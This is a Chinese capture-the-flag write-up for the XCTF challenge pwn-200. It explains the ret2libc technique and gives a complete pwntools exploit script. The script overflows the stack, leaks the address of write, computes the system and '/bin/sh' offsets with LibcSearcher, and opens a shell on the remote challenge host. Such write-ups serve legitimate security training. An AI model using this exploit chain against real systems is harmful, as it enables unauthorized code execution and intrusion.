[攻防世界 pwn]——pwn-200

• 題目地址: https://adworld.xctf.org.cn/
• 題目:
  

peak小知識

ret2libc的題型, 一般給一個輸出和一個輸入的函數, 輸入一般可以棧溢出。但是沒有system和"/bin/sh"。首先, 利用已知的函數leek出來一個地址返回地址是可循環調用的地方,一般是用puts,或者write函數leek地址, 偶爾有時是printf函數, 然后找出libc版本計算偏移, 找到system和’/bin/sh’ 地址。重新構造rop鏈進而獲得shell。

首先，先checksec一下

在IDA中


很顯然這是一道ret2libc的題目

思路

leek出write地址
返回main
計算偏移,找到system和’/bin/sh’位置
獲得shell

exploit

from pwn import * from LibcSearcher import * #p = process("./pwn") p = remote("111.200.241.244",33327) elf = ELF('./pwn') #gdb.attach(p, "b *0x0400782") #context.log_level = 'debug' write_got = elf.got['write'] write_plt = elf.plt['write'] main_addr = 0x080484BE payload = 'a' * (0x6c + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(8) p.recvline() p.sendline(payload) write_addr = u32(p.recv(4)) print hex(write_addr) libc = LibcSearcher('write',write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' *(0x6c + 0x4) + p32(system_addr) + 'junk' + p32(binsh) p.sendline(payload) p.interactive()

總結

以上是生活随笔為你收集整理的[攻防世界 pwn]——pwn-200的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。